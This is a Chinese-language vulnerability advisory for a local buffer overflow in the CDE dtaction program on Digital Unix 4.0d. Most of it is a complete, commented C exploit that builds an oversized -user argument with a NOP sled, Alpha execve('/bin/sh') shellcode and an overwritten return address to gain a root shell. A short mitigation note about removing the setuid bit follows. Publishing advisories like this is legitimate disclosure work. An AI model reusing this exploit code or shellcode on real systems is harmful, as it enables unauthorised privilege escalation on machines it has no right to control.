
Digital Unix CDE dtaction 缓冲溢出代码


发布时间:2001-11-16
更新时间:2001-11-16
严重程度:
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Digital Unix 4.0d CDE dtaction
详细描述
向 Digital Unix 4.0d 的 CDE dtaction 程序传入超长的命令行参数（下面的测试代码通过 -user 参数传入约 8 KB 数据）会触发缓冲区溢出并覆盖返回地址；本地用户可借此让 dtaction 执行任意代码（威胁程度见上文：本地管理员权限）。

测试代码
/*
* dtaction-ex.c
* tested : Digital Unix 4.0d , OSF1 V4.0 878 alpha
*
* cc -o dtaction-ex dtaction-ex.c
*
* truefinder , seo@igrus.inha.ac.kr, seo@underground.or.kr
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


/* Canonical Alpha NOP (0x47ff041f).  main() does not use this macro; it
 * uses nop[] below, which is the same word as little-endian bytes. */
#define NOP 0x47ff041f
/* Bytes of 'A' placed in front of the NOP sled so that the sled/shellcode
 * land on the alignment the author tuned for the tested build. */
#define ALIGNSIZE (9)
/* Length of the argument body handed to "dtaction -user" (excludes ALIGNSIZE). */
#define BUFSIZE (8199 )
/* Intended overwrite value for the saved return address.
 * NOTE(review): main() uses retaddr[] below rather than this macro, and the
 * two do not agree: retaddr[] decodes to 0x11fffeaa0 while this macro is
 * 0x11ffffaa0 (one nibble apart).  retaddr[] is presumably what was tested
 * ("tested: Digital Unix 4.0d") -- confirm before relying on either value. */
#define RETADDR 0x000000011ffffaa0
/* Size in bytes of the NOP sled written before the shellcode (multiple of 4). */
#define DEFNOPSIZE 7168


/* Little-endian bytes of the NOP word, NUL-terminated so strcat() can append it. */
char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
/* Low five bytes of the target return address, little-endian, NUL-terminated.
 * The upper three bytes of the 64-bit address are zero and cannot be carried
 * in a C string; the exploit presumably relies on the overwritten slot already
 * holding zeros there (only five bytes are ever appended). */
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };


/*
 * Alpha (OSF/1 V4.0) execve("/bin/sh") shellcode, credited to ohhara below.
 * 23 instructions / 92 bytes, with no NUL byte, so it survives being carried
 * as a C string through strcat() and execl().
 *
 * Reading the author's mnemonics, it runs in two stages:
 *  1. Self-patching prologue (words 0-7).  The final word is stored as
 *     0xffffffff instead of the real callsys encoding (0x00000083, which
 *     would contain NUL bytes).  "bsr $16,-28" jumps back to word 1 with $16
 *     holding the address of word 8; on that second pass the code stores
 *     0x83 into word 22 via $18 = $16+60 and overwrites the bsr itself with
 *     a NOP so execution falls through.  On the first pass $16 is a stack
 *     address ($30-200), so the same stores only scribble on the stack.
 *  2. Payload (words 8-22).  Writes "/bin" (0x6e69622f) and "/sh\0"
 *     (~0xff978cd0 == 0x0068732f) at $30-200, sets argv at $30-192 to
 *     { path, NULL }, clears envp ($18) and loads $0 = 59 before callsys.
 *     59 is presumably the execve number on this OSF/1 release -- the page
 *     does not state it, so verify against the target's syscall table.
 */
static char shellcode[] =
        "\x30\x15\xd9\x43" /* subq $30,200,$16   -- $16 = sp-200 (first pass) */
        "\x11\x74\xf0\x47" /* bis $31,0x83,$17   -- callsys encoding to patch in */
        "\x12\x94\x07\x42" /* addq $16,60,$18    -- $16+60 = one past word 22 */
        "\xfc\xff\x32\xb2" /* stl $17,-4($18)    -- patch word 22 (2nd pass) */
        "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
        "\x1f\x04\x31\x22" /* lda $17,0x041f($17) -- $17 = NOP word */
        "\xfc\xff\x30\xb2" /* stl $17,-4($16)    -- turn the bsr into a NOP */
        "\xf9\xff\x1f\xd2" /* bsr $16,-28        -- back to word 1, $16 = &word 8 */
        "\x30\x15\xd9\x43" /* subq $30,200,$16   -- $16 = path ("/bin/sh") */
        "\x31\x15\xd8\x43" /* subq $30,192,$17   -- $17 = argv */
        "\x12\x04\xff\x47" /* clr $18            -- envp = NULL */
        "\x40\xff\x1e\xb6" /* stq $16,-192($30)  -- argv[0] = path */
        "\x48\xff\xfe\xb7" /* stq $31,-184($30)  -- argv[1] = NULL */
        "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
        "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
        "\x13\x05\xf3\x47" /* ornot $31,$19,$19  -- $19 = 0x0068732f "/sh\0" */
        "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
        "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
        "\x2f\x62\x73\x22" /* lda $19,0x622f($19) -- $19 = 0x6e69622f "/bin" */
        "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
        "\x13\x94\xe7\x43" /* addq $31,60,$19 */
        "\x20\x35\x60\x42" /* subq $19,1,$0      -- $0 = 59 (syscall number) */
        "\xff\xff\xff\xff"; /* callsys ( disguised ) -- rewritten to 0x83 above */
        /* ohhara's shellcode */


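/*
 * Build the oversized "-user" argument and exec dtaction with it.
 *
 * Layout of the argument (ALIGNSIZE + BUFSIZE bytes are allocated):
 *   [ALIGNSIZE x 'A'] [DEFNOPSIZE/4 copies of nop] [shellcode]
 *   [pad x 'A'] [retaddr] [NUL]
 * where pad = BUFSIZE - DEFNOPSIZE - strlen(shellcode) - 8, which leaves
 * room for the 5-byte retaddr plus the terminator inside BUFSIZE.  The
 * bytes are placed with memcpy/memset at a running pointer instead of
 * repeated strcat() over a growing buffer; the resulting contents are the
 * same.
 *
 * argc/argv are unused; the target path and the "-user" switch are fixed.
 * On success execl() does not return.  Returns EXIT_FAILURE (after
 * reporting the cause) if the size constants are inconsistent, allocation
 * fails, or execl() fails.
 */
int
main(int argc, char *argv[])
{
        const size_t nop_len = strlen(nop);
        const size_t sc_len = strlen(shellcode);
        const size_t ret_len = strlen(retaddr);
        const size_t total = ALIGNSIZE + BUFSIZE;
        size_t pad, needed;
        char *buf, *p;

        (void)argc;
        (void)argv;

        /* Sled + shellcode + retaddr + NUL must fit inside BUFSIZE. */
        if (DEFNOPSIZE + sc_len + 8 > BUFSIZE) {
                fprintf(stderr, "shellcode too long for BUFSIZE\n");
                return EXIT_FAILURE;
        }
        pad = BUFSIZE - DEFNOPSIZE - sc_len - 8;
        needed = ALIGNSIZE + DEFNOPSIZE + sc_len + pad + ret_len + 1;
        if (needed > total) {
                fprintf(stderr, "layout does not fit in %zu bytes\n", total);
                return EXIT_FAILURE;
        }

        buf = malloc(total);
        if (buf == NULL) {
                perror("malloc");
                return EXIT_FAILURE;
        }
        /* Zero everything so the argument is NUL-terminated wherever we stop. */
        memset(buf, 0, total);

        /* Alignment prefix. */
        memset(buf, 'A', ALIGNSIZE);
        p = buf + ALIGNSIZE;

        /* NOP sled: DEFNOPSIZE/4 copies of the 4-byte nop string. */
        for (size_t i = 0; i < DEFNOPSIZE / 4; i++) {
                memcpy(p, nop, nop_len);
                p += nop_len;
        }

        memcpy(p, shellcode, sc_len);
        p += sc_len;

        /* Filler up to the slot holding the saved return address. */
        memset(p, 'A', pad);
        p += pad;

        /* Low bytes of the new return address; the NUL after them ends the string. */
        memcpy(p, retaddr, ret_len);
        p += ret_len;
        *p = '\0';

        execl("/usr/dt/bin/dtaction", "dtaction", "-user", buf, (char *)NULL);

        /* Only reached if the exec failed. */
        perror("execl /usr/dt/bin/dtaction");
        free(buf);
        return EXIT_FAILURE;
}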

解决方案
尚无厂商补丁。临时缓解措施：若 /usr/dt/bin/dtaction 以 setuid root 方式安装（本地提权以此为前提），可去除其 setuid 位或限制普通用户对它的执行权限；这可能影响 CDE 的部分功能，需自行评估。

相关信息